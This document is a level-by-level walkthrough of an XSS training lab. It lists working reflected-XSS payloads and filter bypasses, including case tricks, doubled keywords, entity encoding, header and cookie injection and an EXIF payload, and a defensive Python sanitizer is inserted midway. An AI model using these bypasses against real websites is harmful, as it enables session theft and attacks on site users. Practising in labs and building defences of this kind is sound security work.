Lab address: http://xss.tesla-space.com/?tdsourcetag=s_pcqq_aiomsg
Level 1
http://xss.tesla-space.com/level1.php?name=test
name=<script>alert("xss")</script>
Tag-closing bypass
Level 2
http://xss.tesla-space.com/level2.php?keyword=test
View source
payload:
""><script>alert("xss")</script><"
" onclick=alert(/xss/)><" (click)
Level 3
http://xss.tesla-space.com/level3.php?keyword=a
View source
Input ""><script>alert("xss")</script><" to test; it turns out to be filtered
payload:
' onclick='alert(1) (click)
' oninput='alert(1) (input)
Successfully bypassed
Level 4
xss.tesla-space.com/level4.php?keyword=a
Single quotes are replaced by double quotes
payload:
"onclick="alert(1)
" onclick=alert(/xss/)//
javascript pseudo-protocol bypass
When the double quotes cannot be closed and event attributes such as onclick cannot be used, the pseudo-protocol can still be used to bypass the filter, or an external js file can be called
Level 5
View source
Filters the on* event handlers and script
payload: "><a href=javascript:alert(/xss/)>xss</a>
Successfully bypassed, as shown in the figure
Level 6
Input "><a href=javascript:alert(/xss/)>xss</a> and find that href is filtered; try changing the case
payload:
"><a Href=javascript:alert(/xss/)>xss</a>
"><Script>alert(/xss/)</script>
Double-writing bypass
Level 7
http://xss.tesla-space.com/level7.php?keyword=move%20up
Input: "><a Href=javascript:alert(/xss/)>xss</a>
Input: "><Script>alert(/xss/)</script>
Input: "onclick="alert(1)
The keywords are filtered and changing case does not help, so write them twice
payload:
"oonnclick="alert(1)
"> <scrscriptipt>alert("yes")</scrscriptipt>
"oonnclick="alert(1) succeeds, result as shown in the figure:
Entity encoding bypass
Level 8
http://xss.tesla-space.com/level8.php?keyword=nice%20try
Input "><"
Filtering is found, but there is an a href; input javascript:alert(/xss/)
It gets encoded
Entity encoding site: https://www.qqxiuzi.cn/bianma/zifushiti.php
Encode the t
Decimal entity encoding: javascript:alert(/xss/)
Hexadecimal entity encoding: javascript:alert(/xss/)
Level 9
Input the previous level's payload,
the href directly shows "link not valid"; testing shows the input must contain http
payload: javascript:alert(/xss/)//http://www.baidu.com
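A defender-side example of the checks levels 8 and 9 are missing, added here and not part of the lab or this write-up: normalize the href the way the browser will (decode entities, drop whitespace) before allow-listing its scheme, and entity-encode the attribute value with quotes included, which also closes the quote break-outs of levels 3 and 4. The function names and the sample hrefs are my own constructions.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample hrefs (hypothetical), modelled on the forms in the write-up.
# A "must contain http" check passes the second entry and a pre-decoding
# substring search for "javascript" passes the third, fourth and fifth.
SAMPLE_HREFS = [
    "http://www.baidu.com",                            # legitimate absolute link
    "javascript:alert(/xss/)//http://www.baidu.com",   # contains 'http', scheme is still javascript
    "javascrip&#116;:alert(/xss/)",                    # decimal entity for 't'
    "javascrip&#x74;:alert(/xss/)",                    # hex entity for 't'
    "java\tscript:alert(/xss/)",                       # tab inside the scheme
]

# Bytes browsers ignore inside a scheme: ASCII controls, space, DEL.
_STRIP = re.compile(r"[\x00-\x20\x7f]")

def normalize_href(url: str) -> str:
    """Bring the value into the form the browser acts on BEFORE checking it:
    the HTML parser entity-decodes attribute values, and URL parsing then
    discards whitespace/control bytes, so do both here."""
    return _STRIP.sub("", html.unescape(url))

def is_safe_href(url: str) -> bool:
    """Allow-list the parsed scheme instead of searching the raw string."""
    scheme = urlsplit(normalize_href(url)).scheme.lower()
    return scheme in {"http", "https"}

def escape_attr(value: str) -> str:
    """Entity-encode for a quoted attribute. quote=True encodes both ' and ",
    so neither the single-quote (level 3) nor the double-quote (level 4)
    break-out can terminate the attribute."""
    return html.escape(value, quote=True)

def render_link(href: str, text: str) -> str:
    """Build the <a> tag the lab page builds, with both defenses applied."""
    safe = href if is_safe_href(href) else "#"
    return '<a href="%s">%s</a>' % (escape_attr(safe), escape_attr(text))

if __name__ == "__main__":
    for h in SAMPLE_HREFS:
        print(is_safe_href(h), render_link(h, "xss"))
```

Relative links have an empty scheme and are rejected by this allow-list; if they are needed, add a separate rule for them rather than loosening the scheme check.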
Level 10
The output is encoded; there are three hidden inputs below
payload: t_link=&t_history=&t_sort="onclick="alert()"type="text
Exploited successfully, result as shown in the figure:
type="text": because the page has no element to trigger the event, type="text" creates a text box
Exploitation by intercepting requests
Level 11
http://xss.tesla-space.com/level11.php?keyword=text
Built the same payloads as the previous level and found it is not that simple, none of them work; could not figure it out, looked it up online
Intercept the request and construct the Referer (how would you think of that?)
Referer:1" type="text" onclick="alert(1)
Exploited successfully, result as shown in the figure
Level 12
http://xss.tesla-space.com/level12.php?keyword=good%20job!
This one is obviously header forgery
User-Agent:1"type="text" onclick="alert(1)
Exploited successfully, result as shown in the figure
Level 13
http://xss.tesla-space.com/level13.php?keyword=good%20job!
Use the cookie
1"type="text" onclick="alert(1)
Exploited successfully, result as shown in the figure
Level 14
http://xss.tesla-space.com/level14.php
Viewing the source reveals exif; guess this is exif xss
exif xss is generally used at file-upload points, the classic case being avatar upload: upload an image whose exif metadata has been modified to hold an xss payload, and the popup fires
It is done with the exiftool tool under Kali
Command:
exiftool -FIELD=XSS FILE
exiftool -Artist='"><img src=1 onerror=alert(document.domain)>' brute.jpeg
Level 15
http://xss.tesla-space.com/level15.php
ng-include: this attribute can include files, by default files on the same domain
Construct payload: http://xss.tesla-space.com/level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
Level 16
http://xss.tesla-space.com/level16.php?keyword=<script>
This level filters spaces, script and /
Key point: use %0d and %0a (carriage return and line feed) to bypass the filter
payload:
<img%0asrc=x%0aonerror=alert(1)>
<svg%0aonload=alert(1)>
<img%0dsrc=1%0donerror=alert(1)>
Level 17
http://xss.tesla-space.com/level17.php
http://xss.tesla-space.com/level17.php?arg01=a&arg02=b
arg02= onmouseover=alert(1)
arg02=%20onclick=alert(1)